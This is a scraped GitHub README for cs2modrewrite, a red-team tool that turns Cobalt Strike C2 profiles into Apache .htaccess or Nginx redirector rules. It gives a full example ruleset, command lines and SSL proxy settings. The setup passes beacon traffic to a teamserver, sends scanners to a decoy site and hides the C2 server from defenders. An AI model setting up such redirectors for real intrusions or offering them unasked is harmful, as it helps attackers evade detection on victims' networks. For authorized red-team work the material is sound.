Git Product home page Git Product logo

cs2modrewrite's Introduction

Automatically Generate Rulesets for Apache mod_rewrite or Nginx for Intelligent HTTP C2 Redirection

This project converts a Cobalt Strike profile to a functional mod_rewrite .htaccess or Nginx config file to support HTTP proxy redirection to a CobaltStrike teamserver.

You should test and tune the output as needed before depolying, but these scripts should handle the heavy lifting.

Updates and Features

  • Rewrite Rules based on valid C2 URIs (HTTP GET, POST, and Stager) and specified User-Agent string. Result: Only requests to valid C2 URIs with a specified UA string will be proxied to the Team Server by default.
  • Uses a custom Malleable C2 profile to build a .htaccess file with corresponding mod_rewrite rules
  • Uses a custom Malleable C2 profile to build a Nginx config with corresponding proxy_pass rules
  • Supports the Cobalt Strike custom URI features as of CS 3.10
  • HTTP or HTTPS proxying to the Cobalt Strike Team Server
  • HTTP 302 Redirection to a Legitimate Site for Non-Matching Requests

Quick start

The havex.profile example is included for a quick test.

  1. Run the script against a profile
  2. Save the output to .htaccess
  3. Modify as needed
  4. Use the script with your redirector

Apache mod_rewrite Example

python cs2modrewrite.py -i havex.profile -c https://TEAMSERVER -r https://GOHERE
#### Save the following as .htaccess in the root web directory

########################################
## .htaccess START 
RewriteEngine On

## (Optional)
## Scripted Web Delivery 
## Uncomment and adjust as needed
#RewriteCond %{REQUEST_URI} ^/css/style1.css?$
#RewriteCond %{HTTP_USER_AGENT} ^$
#RewriteRule ^.*$ "http://TEAMSERVER%{REQUEST_URI}" [P,L]

## Default Beacon Staging Support (/1234)
RewriteCond %{REQUEST_URI} ^/..../?$
RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 \(Windows; U; MSIE 7.0; Windows NT 5.2\) Java/1.5.0_08"
RewriteRule ^.*$ "http://TEAMSERVER%{REQUEST_URI}" [P,L]

## C2 Traffic (HTTP-GET, HTTP-POST, HTTP-STAGER URIs)
## Logic: If a requested URI AND the User-Agent matches, proxy the connection to the Teamserver
## Consider adding other HTTP checks to fine tune the check.  (HTTP Cookie, HTTP Referer, HTTP Query String, etc)
## Refer to http://httpd.apache.org/docs/current/mod/mod_rewrite.html
## Profile URIs
RewriteCond %{REQUEST_URI} ^(/include/template/isx.php.*|/wp06/wp-includes/po.php.*|/wp08/wp-includes/dtcla.php.*|/modules/mod_search.php.*|/blog/wp-includes/pomo/src.php.*|/includes/phpmailer/class.pop3.php.*|/api/516280565958.*|/api/516280565959.*)$
## Profile UserAgent
RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 \(Windows; U; MSIE 7.0; Windows NT 5.2\) Java/1.5.0_08"
RewriteRule ^.*$ "https://TEAMSERVER%{REQUEST_URI}" [P,L]

## Redirect all other traffic here (Optional)
RewriteRule ^.*$ HTTPS://GOHERE/ [L,R=302]

## .htaccess END
########################################

Nginx Example

python ./cs2nginx.py -i havex.profile -c https://127.0.0.1 -r https://www.google.com -H mydomain.local

python ./cs2nginx.py -h
usage: cs2nginx.py [-h] [-i INPUTFILE] [-c C2SERVER] [-r REDIRECT]
                [-H HOSTNAME]

Converts Cobalt Strike profiles to Nginx proxy_pass format by using URI
endpoints to create regex matching rules. Make sure the profile passes a
c2lint check before running this script.

optional arguments:
-h, --help      show this help message and exit
-i INPUTFILE    C2 Profile file
-c C2SERVER     C2 Server (http://teamserver_ip or
                https://teamserver_domain)
-r REDIRECT     Redirect bad requests to this URL (http://google.com)
-H HOSTNAME     Hostname for Nginx redirector

Nginx Setup

apt-get install nginx

Apache Rewrite Setup and Tips

Enable Rewrite and Proxy

a2enmod rewrite headers proxy proxy_http ssl cache
a2dismod -f deflate
service apache2 reload

Note: https://bluescreenofjeff.com/2016-06-28-cobalt-strike-http-c2-redirectors-with-apache-mod_rewrite/ "e0x70i pointed out in the comments below that if your Cobalt Strike Malleable C2 profile contains an Accept-Encoding header for gzip, your Apache install may compress that traffic by default and cause your Beacon to be unresponsive or function incorrectly. To overcome this, disable mod_deflate (via a2dismod deflate and add the No Encode ([NE]) flag to your rewrite rules. (Thank you, e0x70i!)"

SL support requires the following in the site config

# Enable SSL
SSLEngine On
# Enable Proxy
SSLProxyEngine On
# Trust Self-Signed Certificates generate by CobaltStrike
SSLProxyVerify none
SSLProxyCheckPeerCN off
SSLProxyCheckPeerName off

HTACCESS

If you plan on using mod_rewrite in .htaccess files, you also need to enable the use of .htaccess files by changing AllowOverride None to AllowOverride All. For the default website, edit /etc/apache2/sites-available/default

<Directory /var/www/>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        Order allow,deny
        allow from all
</Directory>

References

cs2modrewrite.py blog post

Apache mod_rewrite

Cobalt Strike HTTP C2 Redirectors with Apache mod_rewrite

Resilient Red Team HTTPS Redirection Using Nginx - Adam Brown

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.